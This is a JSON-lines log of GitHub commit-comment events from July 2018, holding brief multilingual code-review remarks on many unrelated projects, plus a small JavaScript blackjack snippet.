{"id":"7960338614","type":"CommitCommentEvent","actor":{"login":"chawoohong"},"repo":{"name":"summer-sb/MureokMureok"},"payload":{"comment":{"id":29695507,"position":43,"line":144,"path":"app/src/main/java/com/example/totoroto/mureok/example/example2/ExampleActivity.kt","commit_id":"6c9732ecab79f3858db0f8046e8be47b7682f58c","created_at":"2018-07-13T06:45:47Z","updated_at":"2018-07-13T06:45:47Z","author_association":"COLLABORATOR","body":"처음값이 아니라 RETRY_COUNT를 상수로 빼달라는 요청이었습니다.\r\n최초값은 굳이 상수로 뺄 필요가 없을 것 같습니다"}},"created_at":"2018-07-13T06:45:47Z"}
{"id":"7960341100","type":"CommitCommentEvent","actor":{"login":"chawoohong"},"repo":{"name":"summer-sb/MureokMureok"},"payload":{"comment":{"id":29695510,"position":42,"line":143,"path":"app/src/main/java/com/example/totoroto/mureok/example/example2/ExampleActivity.kt","commit_id":"6c9732ecab79f3858db0f8046e8be47b7682f58c","created_at":"2018-07-13T06:46:32Z","updated_at":"2018-07-13T06:46:32Z","author_association":"COLLABORATOR","body":"왜 다시 class로 나왔나요??"}},"created_at":"2018-07-13T06:46:32Z"}
{"id":"7960344056","type":"CommitCommentEvent","actor":{"login":"solenchey"},"repo":{"name":"doyoe/react-native-stylesheet-guide"},"payload":{"comment":{"id":29695515,"position":null,"line":null,"path":null,"commit_id":"c6b087666941f95de7a6726bdd581898287344bc","created_at":"2018-07-13T06:47:23Z","updated_at":"2018-07-13T06:47:23Z","author_association":"NONE","body":"Readme-edits"}},"created_at":"2018-07-13T06:47:23Z"}
{"id":"7960345327","type":"CommitCommentEvent","actor":{"login":"romgrk"},"repo":{"name":"Place1/node-gir"},"payload":{"comment":{"id":29695518,"position":46,"line":50,"path":"src/closure.cpp","commit_id":"109efbd129cfb415bacd34e5b60e5d0dcab2892d","created_at":"2018-07-13T06:47:45Z","updated_at":"2018-07-13T06:47:45Z","author_association":"NONE","body":"It works on \"normal\" architectures (64 bits) because everything is passed as a pointer, and GIArgument also has the size of a pointer. Might break on more exotic machines, but doesn't matter at this point."}},"created_at":"2018-07-13T06:47:45Z"}
{"id":"7960345989","type":"CommitCommentEvent","actor":{"login":"japgolly"},"repo":{"name":"japgolly/scalajs-react"},"payload":{"comment":{"id":29695519,"position":null,"line":null,"path":null,"commit_id":"6446d73464f5f4836d1af1aff5f750325f8e24f7","created_at":"2018-07-13T06:47:58Z","updated_at":"2018-07-13T06:47:58Z","author_association":"OWNER","body":"Just tried it and it worked! Thank you very much @rpiaggio !!"}},"created_at":"2018-07-13T06:47:58Z"}
{"id":"7960346033","type":"CommitCommentEvent","actor":{"login":"hypery2k"},"repo":{"name":"jenkinsci/rocketchatnotifier-plugin"},"payload":{"comment":{"id":29695520,"position":14,"line":38,"path":"pom.xml","commit_id":"0194817e43b38d1ad224c439ef66ac6dd287146d","created_at":"2018-07-13T06:47:58Z","updated_at":"2018-07-13T06:47:58Z","author_association":"NONE","body":"you are totally rights. Thanks"}},"created_at":"2018-07-13T06:47:58Z"}
{"id":"7960348095","type":"CommitCommentEvent","actor":{"login":"uhu79"},"repo":{"name":"daviddbeasy/roll20-character-sheets"},"payload":{"comment":{"id":29695522,"position":null,"line":null,"path":null,"commit_id":"941b3c16547f7519d7286c19a55e3edbb4a9946a","created_at":"2018-07-13T06:48:35Z","updated_at":"2018-07-13T06:48:35Z","author_association":"NONE","body":"Great David! :)\r\nPlease use this forum to get in touch with me and I will tell you how and where to access the current working environment (trello and roll20).\r\n\r\nhttps://rpggeek.com/thread/2024136/fellowship-roll20-character-sheet\r\n\r\nbr, Stefan"}},"created_at":"2018-07-13T06:48:35Z"}
{"id":"7960348470","type":"CommitCommentEvent","actor":{"login":"Kingkong302"},"repo":{"name":"Agasper/unity-android-notifications"},"payload":{"comment":{"id":29695523,"position":null,"line":null,"path":null,"commit_id":"9703a363b50fc0a9c7121f41f6e02a8af2ad97aa","created_at":"2018-07-13T06:48:41Z","updated_at":"2018-07-13T06:48:41Z","author_association":"NONE","body":"Should i replace this script with the other which is in project"}},"created_at":"2018-07-13T06:48:41Z"}
{"id":"7960348892","type":"CommitCommentEvent","actor":{"login":"chawoohong"},"repo":{"name":"summer-sb/MureokMureok"},"payload":{"comment":{"id":29695524,"position":40,"line":141,"path":"app/src/main/java/com/example/totoroto/mureok/example/example2/ExampleActivity.kt","commit_id":"6c9732ecab79f3858db0f8046e8be47b7682f58c","created_at":"2018-07-13T06:48:48Z","updated_at":"2018-07-13T06:48:48Z","author_association":"COLLABORATOR","body":"이건 ERROR가 아니므로 이름을 바꾸는 것이 좋겠습니다."}},"created_at":"2018-07-13T06:48:48Z"}
{"id":"7960352196","type":"CommitCommentEvent","actor":{"login":"mithunshashidhara"},"repo":{"name":"lntdev/sawtooth-core"},"payload":{"comment":{"id":29695528,"position":94,"line":94,"path":"rest_api/tests/api_test/fixtures.py","commit_id":"4088df9911ff12a6b0bd3e610ba4477e6fba08e1","created_at":"2018-07-13T06:49:44Z","updated_at":"2018-07-13T06:49:44Z","author_association":"COLLABORATOR","body":"this block of code is not readable, there is no proper indentation, for loop in end of line, is python interpreter accepting this piece of code?  "}},"created_at":"2018-07-13T06:49:44Z"}
{"id":"7960352891","type":"CommitCommentEvent","actor":{"login":"ifs78"},"repo":{"name":"ifs78/myRep"},"payload":{"comment":{"id":29695529,"position":null,"line":null,"path":null,"commit_id":"2f2977cccd9897d47d4f449dc0372e88589af48f","created_at":"2018-07-13T06:49:57Z","updated_at":"2018-07-13T06:49:57Z","author_association":"OWNER","body":"<meta charset=\"utf-8\">\r\n<script>\r\nfunction getRandomInt(min,max) {\r\n\treturn Math.floor(Math.random()*(max-min+1)) + min;\r\n}\r\nfunction getCard() {\r\n\tvar cards = ['6', '7', '8', '9','10', 'J', 'Q', 'K', 'A'];\r\n\treturn cards[getRandomInt(0, cards.length - 1)];\r\n}\r\nfunction getSumm(arr){\r\n\tvar sum = 0;\r\nfor (var i = 0; i < arr.length; i++) {\r\n\tif (arr[i] == 'J' || arr[i] == 'Q' || arr[i] == 'K') {\r\n\t\tarr[i] = '10';\r\n\t} \r\n\telse if (arr[i] == \"A\" && sum <= 10) {arr[i] = '11';} \r\n\t\telse if (arr[i] == \"A\" && sum > 10) {arr[i] = '1';}\r\n\tsum=sum+parseInt(arr[i]);\r\n\t}\r\n\r\n\treturn sum;\r\n\r\n\t}\r\n\r\nvar dealer = [getCard()];\r\nvar player = [getCard(), getCard()];\r\n\r\nalert('Дилер: ' + dealer.join(' ') + ' Игрок: ' + player.join(' '));\r\nalert('Текущая сумма карт у игрока: ' + getSumm(player));\r\n</script>"}},"created_at":"2018-07-13T06:49:57Z"}
{"id":"7960357649","type":"CommitCommentEvent","actor":{"login":"Sangeethashylu"},"repo":{"name":"virtual-labs/problem-solving-iiith"},"payload":{"comment":{"id":29695542,"position":null,"line":null,"path":null,"commit_id":"19ba9f2933659dbd897c748324262197ac3d0bfd","created_at":"2018-07-13T06:51:14Z","updated_at":"2018-07-13T06:51:14Z","author_association":"NONE","body":"validated"}},"created_at":"2018-07-13T06:51:14Z"}
{"id":"7960363769","type":"CommitCommentEvent","actor":{"login":"jkosir"},"repo":{"name":"celtra/stateless-components"},"payload":{"comment":{"id":29695554,"position":null,"line":null,"path":null,"commit_id":"ac7cab37ffdd83fb52c8f8aeb986b60c07b11eb4","created_at":"2018-07-13T06:52:58Z","updated_at":"2018-07-13T06:52:58Z","author_association":"CONTRIBUTOR","body":"@zigomir Hm strange, I guess it's including whole lodash then. We also do ```import { debounce } from 'lodash'``` in  selectbox.vue, how come that doesn't include the full lib? 🤔 \r\n\r\nI'll replace both with ldoash.throttle and lodash.debounce"}},"created_at":"2018-07-13T06:52:58Z"}
{"id":"7960365815","type":"CommitCommentEvent","actor":{"login":"Kingkong302"},"repo":{"name":"Agasper/unity-android-notifications"},"payload":{"comment":{"id":29695566,"position":null,"line":null,"path":null,"commit_id":"9703a363b50fc0a9c7121f41f6e02a8af2ad97aa","created_at":"2018-07-13T06:53:33Z","updated_at":"2018-07-13T06:53:33Z","author_association":"NONE","body":"And i am facing issue,when i quit game and restart device,notification does not,without restarting it works fine.\r\nAnyone can please help me?\r\nThankyou"}},"created_at":"2018-07-13T06:53:33Z"}
{"id":"7960366981","type":"CommitCommentEvent","actor":{"login":"Den-JavaAndroid"},"repo":{"name":"Erdemtsynduev/homework-makeYourAppMaterial-androidApp"},"payload":{"comment":{"id":29695568,"position":null,"line":null,"path":null,"commit_id":"6976cdeb6ece56a0e97e99b3b6f186f8ae13b64f","created_at":"2018-07-13T06:53:52Z","updated_at":"2018-07-13T06:53:52Z","author_association":"NONE","body":"I understand, Thanks."}},"created_at":"2018-07-13T06:53:52Z"}
{"id":"7960367307","type":"CommitCommentEvent","actor":{"login":"Alexadlu"},"repo":{"name":"skyoung/MemTrack"},"payload":{"comment":{"id":29695570,"position":null,"line":null,"path":null,"commit_id":"c749701b8700867bd0828a2f85cbc3502965f73e","created_at":"2018-07-13T06:53:58Z","updated_at":"2018-07-13T06:53:58Z","author_association":"NONE","body":"I hope it's quick！thank you "}},"created_at":"2018-07-13T06:53:58Z"}
{"id":"7960368782","type":"CommitCommentEvent","actor":{"login":"hzyice"},"repo":{"name":"hzyice/springcloud"},"payload":{"comment":{"id":29695571,"position":null,"line":null,"path":null,"commit_id":"6d638ecedd2d0aeb809da9d07e7e7d0327f346b1","created_at":"2018-07-13T06:54:22Z","updated_at":"2018-07-13T06:54:22Z","author_association":"OWNER","body":"jkkjmhkm"}},"created_at":"2018-07-13T06:54:22Z"}
{"id":"7960372298","type":"CommitCommentEvent","actor":{"login":"aqx1991"},"repo":{"name":"aqx1991/AndroidDemo"},"payload":{"comment":{"id":29695575,"position":null,"line":null,"path":null,"commit_id":"b3cd62a68bd0df3fbfe2bfbe395e800ee53c7581","created_at":"2018-07-13T06:55:24Z","updated_at":"2018-07-13T06:55:24Z","author_association":"OWNER","body":"AndroidDemo"}},"created_at":"2018-07-13T06:55:24Z"}
{"id":"7960376222","type":"CommitCommentEvent","actor":{"login":"mithunshashidhara"},"repo":{"name":"lntdev/sawtooth-core"},"payload":{"comment":{"id":29695590,"position":246,"line":246,"path":"rest_api/tests/api_test/utils.py","commit_id":"4088df9911ff12a6b0bd3e610ba4477e6fba08e1","created_at":"2018-07-13T06:56:27Z","updated_at":"2018-07-13T06:56:27Z","author_association":"COLLABORATOR","body":"if you are trying to check if validators are in consensus comparing chain heads should be sufficient right. where is the logic for getting blocks from second validator? "}},"created_at":"2018-07-13T06:56:27Z"}
{"id":"7960380208","type":"CommitCommentEvent","actor":{"login":"andy505050"},"repo":{"name":"andy505050/MVCHomwork"},"payload":{"comment":{"id":29695607,"position":null,"line":null,"path":null,"commit_id":"e9868ac9cc92b3197a12e27af189a0f3f438f753","created_at":"2018-07-13T06:57:34Z","updated_at":"2018-07-13T06:57:34Z","author_association":"OWNER","body":"約2小時"}},"created_at":"2018-07-13T06:57:34Z"}
{"id":"7960390733","type":"CommitCommentEvent","actor":{"login":"candirufish"},"repo":{"name":"candirufish/Stockfish"},"payload":{"comment":{"id":29695633,"position":null,"line":null,"path":null,"commit_id":"ad5b8883142952c89eb3e68500cd5e5399950e54","created_at":"2018-07-13T07:00:25Z","updated_at":"2018-07-13T07:00:25Z","author_association":"OWNER","body":"@Mindbreaker1 The small values also moved a lot thoughout the entire tuning session though with smaller margin. The passed danger and close enemies seems the most sensitive (changing closeenemies alone to 6 failed before but now it passes), whether or not they are close to optimal I don't know, but it seems some parameters are also correlated to others."}},"created_at":"2018-07-13T07:00:25Z"}
{"id":"7960391057","type":"CommitCommentEvent","actor":{"login":"dipjyoti150488"},"repo":{"name":"dipjyoti150488/background-generator"},"payload":{"comment":{"id":29695635,"position":null,"line":null,"path":null,"commit_id":"bc88157208c3390f46c716e595f7b88a6a58c9c7","created_at":"2018-07-13T07:00:30Z","updated_at":"2018-07-13T07:00:30Z","author_association":"OWNER","body":"marcy, i've changed the text. what do you think?"}},"created_at":"2018-07-13T07:00:30Z"}
{"id":"7960395300","type":"CommitCommentEvent","actor":{"login":"mcdachpappe"},"repo":{"name":"mady51/unifiedOp3"},"payload":{"comment":{"id":29695639,"position":null,"line":null,"path":null,"commit_id":"5a0e2e8c71124ebca9aa9550c67e176bb4a5ee87","created_at":"2018-07-13T07:01:38Z","updated_at":"2018-07-13T07:01:38Z","author_association":"NONE","body":"you are adding it twice?"}},"created_at":"2018-07-13T07:01:38Z"}
{"id":"7960395697","type":"CommitCommentEvent","actor":{"login":"chawoohong"},"repo":{"name":"summer-sb/MureokMureok"},"payload":{"comment":{"id":29695640,"position":40,"line":133,"path":"app/src/main/java/com/example/totoroto/mureok/example/example2/ExampleActivity.kt","commit_id":"f5749e660c6d4d94d444507c776d9ddb4104df38","created_at":"2018-07-13T07:01:45Z","updated_at":"2018-07-13T07:01:45Z","author_association":"COLLABORATOR","body":"여전히 좋은 이름은 아닌것 같지만 일단 넘기시죠"}},"created_at":"2018-07-13T07:01:45Z"}
{"id":"7960397887","type":"CommitCommentEvent","actor":{"login":"felixonmars"},"repo":{"name":"felixonmars/dnsmasq-china-list"},"payload":{"comment":{"id":29695641,"position":4,"line":2939,"path":"accelerated-domains.china.conf","commit_id":"f0a238568273d7f9039eebc9ca303b2db5588de4","created_at":"2018-07-13T07:02:20Z","updated_at":"2018-07-13T07:02:20Z","author_association":"OWNER","body":"合并的时候看漏了……已在 98f4bbced 修复"}},"created_at":"2018-07-13T07:02:20Z"}
{"id":"7960403957","type":"CommitCommentEvent","actor":{"login":"accuminium"},"repo":{"name":"pulp-platform/style-guidelines"},"payload":{"comment":{"id":29695651,"position":26,"line":26,"path":"README.md","commit_id":"19f16281a889ebeffdfd4aea381a6026408c3d2a","created_at":"2018-07-13T07:04:02Z","updated_at":"2018-07-13T07:04:02Z","author_association":"MEMBER","body":"I think we should add that Modules must be `lower_snake_case`, and adapt the examples for module code accordingly (just change the name from `A` to `foo` etc.)."}},"created_at":"2018-07-13T07:04:02Z"}
{"id":"7960404425","type":"CommitCommentEvent","actor":{"login":"juhlee-microsoft"},"repo":{"name":"mbivolan/LISAv2"},"payload":{"comment":{"id":29695654,"position":16,"line":16,"path":"Libraries/RunTest.psm1","commit_id":"8c91a23f2b7840b1d2b10619d7e4ca0df2c3d980","created_at":"2018-07-13T07:04:10Z","updated_at":"2018-07-13T07:04:10Z","author_association":"NONE","body":"This function name and its module file name are strange in this folder 'Libraries'. We'd like to keep all common modules in Libraries folder. Run-SetupScript and RunTest do not fall into the folder name criteria. Please find alternative."}},"created_at":"2018-07-13T07:04:10Z"}
{"id":"7960409233","type":"CommitCommentEvent","actor":{"login":"tobbi"},"repo":{"name":"SuperTux/supertux"},"payload":{"comment":{"id":29695663,"position":83,"line":569,"path":"src/object/bonus_block.cpp","commit_id":"00b2354085edb709cd58ff740f3697d985bd68b8","created_at":"2018-07-13T07:05:30Z","updated_at":"2018-07-13T07:05:30Z","author_association":"MEMBER","body":"I can't distinguish rocks and and trampolines that way, both are CONTENT_CUSTOM"}},"created_at":"2018-07-13T07:05:30Z"}
{"id":"7960410345","type":"CommitCommentEvent","actor":{"login":"MarekSuchanek"},"repo":{"name":"DataStewardshipWizard/dsw-server"},"payload":{"comment":{"id":29695666,"position":29,"line":34,"path":"lib/Service/DataManagementPlan/Templates/Html.hs","commit_id":"ecad5486cc4019df91b111264a98ffe4f329cd76","created_at":"2018-07-13T07:05:49Z","updated_at":"2018-07-13T07:05:49Z","author_association":"MEMBER","body":"We want admin to provide URL to their instance that can start with `http://` or `https://` but I want to show in template just address without the protocol. Maybe it would be better to use `breakOnEnd \"://\"` and take the second part? "}},"created_at":"2018-07-13T07:05:49Z"}
{"id":"7960411655","type":"CommitCommentEvent","actor":{"login":"MarekSuchanek"},"repo":{"name":"DataStewardshipWizard/dsw-server"},"payload":{"comment":{"id":29695671,"position":1,"line":1,"path":"lib/Service/DataManagementPlan/Templates/Settings.hs","commit_id":"ecad5486cc4019df91b111264a98ffe4f329cd76","created_at":"2018-07-13T07:06:12Z","updated_at":"2018-07-13T07:06:12Z","author_association":"MEMBER","body":"OK, I will look at that..."}},"created_at":"2018-07-13T07:06:12Z"}
{"id":"7960416155","type":"CommitCommentEvent","actor":{"login":"kaweesi"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29695679,"position":2,"line":2,"path":"omod/src/main/webapp/pages/msfcore.gsp","commit_id":"9ae781f9c018a058dc5632c88bc650db3054afdc","created_at":"2018-07-13T07:07:28Z","updated_at":"2018-07-13T07:07:28Z","author_association":"COLLABORATOR","body":"not necessary for this change commit"}},"created_at":"2018-07-13T07:07:28Z"}
{"id":"7960421610","type":"CommitCommentEvent","actor":{"login":"Sangeethashylu"},"repo":{"name":"virtual-labs/physical-chemistry-iiith"},"payload":{"comment":{"id":29695687,"position":null,"line":null,"path":null,"commit_id":"2dcb0f0d6b2e52c03ece96a324fe56908f384988","created_at":"2018-07-13T07:08:54Z","updated_at":"2018-07-13T07:08:54Z","author_association":"NONE","body":"validated"}},"created_at":"2018-07-13T07:08:54Z"}
{"id":"7960423217","type":"CommitCommentEvent","actor":{"login":"qiuqiulanfeng"},"repo":{"name":"qiuqiulanfeng/vue"},"payload":{"comment":{"id":29695692,"position":null,"line":null,"path":null,"commit_id":"c8fe7cfb5302af3b6ae7abf4cb0b9714acd57cc1","created_at":"2018-07-13T07:09:18Z","updated_at":"2018-07-13T07:09:18Z","author_association":"OWNER","body":"vue笔记"}},"created_at":"2018-07-13T07:09:18Z"}
{"id":"7960423909","type":"CommitCommentEvent","actor":{"login":"kaweesi"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29695694,"position":17,"line":35,"path":"omod/src/main/resources/apps/msfcore_registration_app.json","commit_id":"9ae781f9c018a058dc5632c88bc650db3054afdc","created_at":"2018-07-13T07:09:27Z","updated_at":"2018-07-13T07:09:27Z","author_association":"COLLABORATOR","body":"i created a new widget at: https://github.com/jembi/openmrs-module-msfcore/commit/5f25d1f5d29251a37202318cafeaca4e7f3e0eec since concept wasn't supported"}},"created_at":"2018-07-13T07:09:27Z"}
{"id":"7960424771","type":"CommitCommentEvent","actor":{"login":"MarekSuchanek"},"repo":{"name":"DataStewardshipWizard/dsw-server"},"payload":{"comment":{"id":29695696,"position":13,"line":13,"path":"lib/Service/DataManagementPlan/Templates/Settings.hs","commit_id":"ecad5486cc4019df91b111264a98ffe4f329cd76","created_at":"2018-07-13T07:09:40Z","updated_at":"2018-07-13T07:09:40Z","author_association":"MEMBER","body":"Yes, and we will need to load also the template from `.html` and `.css` from some folder with specific names (e.g., `reference.html` and `header.html`). It would be better to separate gathering those and using them in DMP export - it will be then easier to change its storage from cfg to db with editing just the handler..."}},"created_at":"2018-07-13T07:09:40Z"}
{"id":"7960426646","type":"CommitCommentEvent","actor":{"login":"Mars1031"},"repo":{"name":"JoyBeginner/PointsAccumulated"},"payload":{"comment":{"id":29695699,"position":null,"line":null,"path":null,"commit_id":"802d67a7141d33c75f50bb645a97c38d71542beb","created_at":"2018-07-13T07:10:08Z","updated_at":"2018-07-13T07:10:08Z","author_association":"COLLABORATOR","body":" - zhaowenshen_0713test\r\n-- 学习任务 eg ： vue全家桶\r\n-- 路线记录 eg ： vue官网\r\n-- 问题 eg ： vue-route用于登录跳转\r\n-- 成果 eg ： \r\n+- 学习任务 \r\n+  - eg ： vue全家桶\r\n+- 路线记录 \r\n+  - eg ： vue官网\r\n+- 问题 \r\n+  - eg ： vue-route用于登录跳转\r\n+- 成果 \r\n+  - eg ： "}},"created_at":"2018-07-13T07:10:08Z"}
{"id":"7960429938","type":"CommitCommentEvent","actor":{"login":"pinktimes"},"repo":{"name":"DPortillo821/conversation-analyzer"},"payload":{"comment":{"id":29695703,"position":null,"line":null,"path":null,"commit_id":"4cd07aed13f39c68d38d7616a7f50bc92daa8eb5","created_at":"2018-07-13T07:10:54Z","updated_at":"2018-07-13T07:10:54Z","author_association":"COLLABORATOR","body":"GitHub cannot recognize Korean and Japanese"}},"created_at":"2018-07-13T07:10:54Z"}
{"id":"7960430806","type":"CommitCommentEvent","actor":{"login":"jordens"},"repo":{"name":"m-labs/artiq"},"payload":{"comment":{"id":29695707,"position":null,"line":null,"path":null,"commit_id":"4cfb47da8db493bac90feb8e60a4063a28a288e7","created_at":"2018-07-13T07:11:08Z","updated_at":"2018-07-13T07:11:08Z","author_association":"MEMBER","body":"Or already bail if the naive comparison fails (i.e. don't support multiple retrieval of an array)"}},"created_at":"2018-07-13T07:11:08Z"}
{"id":"7960434208","type":"CommitCommentEvent","actor":{"login":"Gobliins"},"repo":{"name":"zaiste/async-await-mocha-chai-example"},"payload":{"comment":{"id":29695712,"position":null,"line":null,"path":null,"commit_id":"1a80beaa6ef936ef8c8ebdf5cc24c6179a3a4983","created_at":"2018-07-13T07:12:02Z","updated_at":"2018-07-13T07:12:02Z","author_association":"NONE","body":"`before(async () => {`\r\ngives me unexpected Token error at the final bracket...\r\nI`m on Mocha 5.x and Node 6.11\r\nAre you using a transpiler, i don't see Babel in your package.json..\r\n\r\nWhy am i getting this error?"}},"created_at":"2018-07-13T07:12:02Z"}
{"id":"7960434575","type":"CommitCommentEvent","actor":{"login":"karocksjoelee"},"repo":{"name":"karocksjoelee/udemy_first_flutter_app"},"payload":{"comment":{"id":29695716,"position":null,"line":null,"path":null,"commit_id":"81f6e307496b847bdc675dd5c4852a5f8c57ac5e","created_at":"2018-07-13T07:12:08Z","updated_at":"2018-07-13T07:12:08Z","author_association":"OWNER","body":"**SCAFOLDDING:**\r\n\r\n**.idea** -> for Android Studio config\r\n**android** -> contains native source codes and android working flows\r\n**build** -> require for the build process\r\n**ios** -> contains native source codes and ios working flows\r\n**lib** -_> where your will write your flutter app._\r\n**test** -> write automatic testings\r\n**.gitignore** -> for gits\r\n**.metadata** -> for flutter SDK\r\n**.packages** -> for flutter SDK\r\n**.flutter_project_name_android.iml** -> for flutter SDK\r\n**.flutter_project_name.iml** -> for flutter SDK\r\n**pubspec.yaml** -> add third party package ( dependency control ) , add static assets."}},"created_at":"2018-07-13T07:12:08Z"}
{"id":"7960436994","type":"CommitCommentEvent","actor":{"login":"Jamshidsbot"},"repo":{"name":"Jamshidsbot/myrep"},"payload":{"comment":{"id":29695720,"position":null,"line":null,"path":null,"commit_id":"849a345ea8c4534f823fe4f9600f965c86953d7e","created_at":"2018-07-13T07:12:46Z","updated_at":"2018-07-13T07:12:46Z","author_association":"OWNER","body":"Hello"}},"created_at":"2018-07-13T07:12:46Z"}
{"id":"7960437046","type":"CommitCommentEvent","actor":{"login":"dying2003"},"repo":{"name":"holochain/holochain-rust"},"payload":{"comment":{"id":29695721,"position":14,"line":21,"path":"core/Cargo.toml","commit_id":"c6e9b6fe241d45d269dc2d153ab4dfc07ce1267c","created_at":"2018-07-13T07:12:47Z","updated_at":"2018-07-13T07:12:47Z","author_association":"NONE","body":"00"}},"created_at":"2018-07-13T07:12:47Z"}
{"id":"7960439393","type":"CommitCommentEvent","actor":{"login":"accuminium"},"repo":{"name":"pulp-platform/style-guidelines"},"payload":{"comment":{"id":29695727,"position":17,"line":17,"path":"README.md","commit_id":"19f16281a889ebeffdfd4aea381a6026408c3d2a","created_at":"2018-07-13T07:13:25Z","updated_at":"2018-07-13T07:13:25Z","author_association":"MEMBER","body":"I think we should establish one style per construct and stick to it -- no alternatives. Both `camelCase` and `snake_case` are reasonable, and using one style per construct consistently is more important than the choice of one of the two. "}},"created_at":"2018-07-13T07:13:25Z"}
{"id":"7960442673","type":"CommitCommentEvent","actor":{"login":"allenu"},"repo":{"name":"allenu/YokosukaJS"},"payload":{"comment":{"id":29695732,"position":12,"line":15,"path":"TODOs.md","commit_id":"cba5c9643f76d9a19a905ffa533cec15d2af0dcb","created_at":"2018-07-13T07:14:21Z","updated_at":"2018-07-13T07:14:21Z","author_association":"OWNER","body":"I realized there was a design bug in how signal predicates were defined. The next few commits fixes it and moves to a new generic command system, which is much nicer than the old code that was there for handling script commands."}},"created_at":"2018-07-13T07:14:21Z"}
{"id":"7960446796","type":"CommitCommentEvent","actor":{"login":"accuminium"},"repo":{"name":"pulp-platform/style-guidelines"},"payload":{"comment":{"id":29695740,"position":30,"line":30,"path":"README.md","commit_id":"19f16281a889ebeffdfd4aea381a6026408c3d2a","created_at":"2018-07-13T07:15:28Z","updated_at":"2018-07-13T07:15:28Z","author_association":"MEMBER","body":"What is the definition of a project? Is it a standalone IP such as an interconnect?"}},"created_at":"2018-07-13T07:15:28Z"}
{"id":"7960451077","type":"CommitCommentEvent","actor":{"login":"Liugq5713"},"repo":{"name":"Amoxi1/test"},"payload":{"comment":{"id":29695745,"position":6,"line":3,"path":"todo.js","commit_id":"efc738b8017f02495ebaa8383d44115aa768e619","created_at":"2018-07-13T07:16:34Z","updated_at":"2018-07-13T07:16:34Z","author_association":"NONE","body":"驼峰！！！驼峰！！！！"}},"created_at":"2018-07-13T07:16:34Z"}
{"id":"7960451298","type":"CommitCommentEvent","actor":{"login":"zewazla"},"repo":{"name":"zewazla/notes-software-testing"},"payload":{"comment":{"id":29695746,"position":null,"line":null,"path":null,"commit_id":"a0181ab30cf7362a825ec9ac23fbc77a432ab8cd","created_at":"2018-07-13T07:16:38Z","updated_at":"2018-07-13T07:16:38Z","author_association":"OWNER","body":"webinar notes"}},"created_at":"2018-07-13T07:16:38Z"}
{"id":"7960455719","type":"CommitCommentEvent","actor":{"login":"NebuHiiEjamu"},"repo":{"name":"assimp/assimp"},"payload":{"comment":{"id":29695753,"position":null,"line":null,"path":null,"commit_id":"0e51382246180909b3b88bd93d3c92b7a00f8aa0","created_at":"2018-07-13T07:17:47Z","updated_at":"2018-07-13T07:17:47Z","author_association":"CONTRIBUTOR","body":"Whoops. Thanks. I've been busy with paid work lately."}},"created_at":"2018-07-13T07:17:47Z"}
{"id":"7960461444","type":"CommitCommentEvent","actor":{"login":"tonkotsurobot"},"repo":{"name":"tonkotsurobot/centos-packer"},"payload":{"comment":{"id":29695759,"position":null,"line":null,"path":null,"commit_id":"cc798d8e669d4d1f3aafb3a58f1436a97c5fcd03","created_at":"2018-07-13T07:19:12Z","updated_at":"2018-07-13T07:19:12Z","author_association":"OWNER","body":"reverting back"}},"created_at":"2018-07-13T07:19:12Z"}
{"id":"7960464960","type":"CommitCommentEvent","actor":{"login":"moigagoo"},"repo":{"name":"pragmagic/karax"},"payload":{"comment":{"id":29695772,"position":6,"line":24,"path":"karax/karaxdsl.nim","commit_id":"015590e8060402f9f31a16f6de1d6371f64c3317","created_at":"2018-07-13T07:20:04Z","updated_at":"2018-07-13T07:20:04Z","author_association":"NONE","body":"@Araq Just stumbled upon this code and can't figure out its purpose. Why are only three-character attribute prefixes and a single \"-\" allowed? Does it mean that [data attributes](https://www.w3schools.com/tags/att_global_data.asp) are disallowed?"}},"created_at":"2018-07-13T07:20:04Z"}
{"id":"7960468853","type":"CommitCommentEvent","actor":{"login":"EthanPui"},"repo":{"name":"EthanPui/AA-Login"},"payload":{"comment":{"id":29695782,"position":null,"line":null,"path":null,"commit_id":"3a5ed251a1d142d054fd8b6f0e59e0a88da48d2b","created_at":"2018-07-13T07:21:05Z","updated_at":"2018-07-13T07:21:05Z","author_association":"OWNER","body":"Applied a forgot login activity through firebase email"}},"created_at":"2018-07-13T07:21:05Z"}
{"id":"7960472267","type":"CommitCommentEvent","actor":{"login":"accuminium"},"repo":{"name":"pulp-platform/style-guidelines"},"payload":{"comment":{"id":29695791,"position":31,"line":31,"path":"README.md","commit_id":"19f16281a889ebeffdfd4aea381a6026408c3d2a","created_at":"2018-07-13T07:21:56Z","updated_at":"2018-07-13T07:21:56Z","author_association":"MEMBER","body":"What is the rationale of suffixing the top-level module of an IP with `_top`? Why not just `<project>.sv`? I think that suffix does not add value and `<project>.sv` (e.g., `fifo.sv` or `axi_interconnect.sv`) is just as unambiguous and easier for developers to remember."}},"created_at":"2018-07-13T07:21:56Z"}
{"id":"7960472517","type":"CommitCommentEvent","actor":{"login":"leviathonbeast"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29695792,"position":null,"line":null,"path":null,"commit_id":"c6216de7ba94d8dd163e8b857b12fd76bbcb2380","created_at":"2018-07-13T07:22:00Z","updated_at":"2018-07-13T07:22:00Z","author_association":"NONE","body":"might need to fix the GUID's :P"}},"created_at":"2018-07-13T07:22:00Z"}
{"id":"7960474575","type":"CommitCommentEvent","actor":{"login":"sara0871"},"repo":{"name":"codefresh-io/cf-errors"},"payload":{"comment":{"id":29695795,"position":null,"line":null,"path":null,"commit_id":"0d74240621dbbe14f07634d115763b1e272e4b04","created_at":"2018-07-13T07:22:29Z","updated_at":"2018-07-13T07:22:29Z","author_association":"NONE","body":"👍👏"}},"created_at":"2018-07-13T07:22:29Z"}
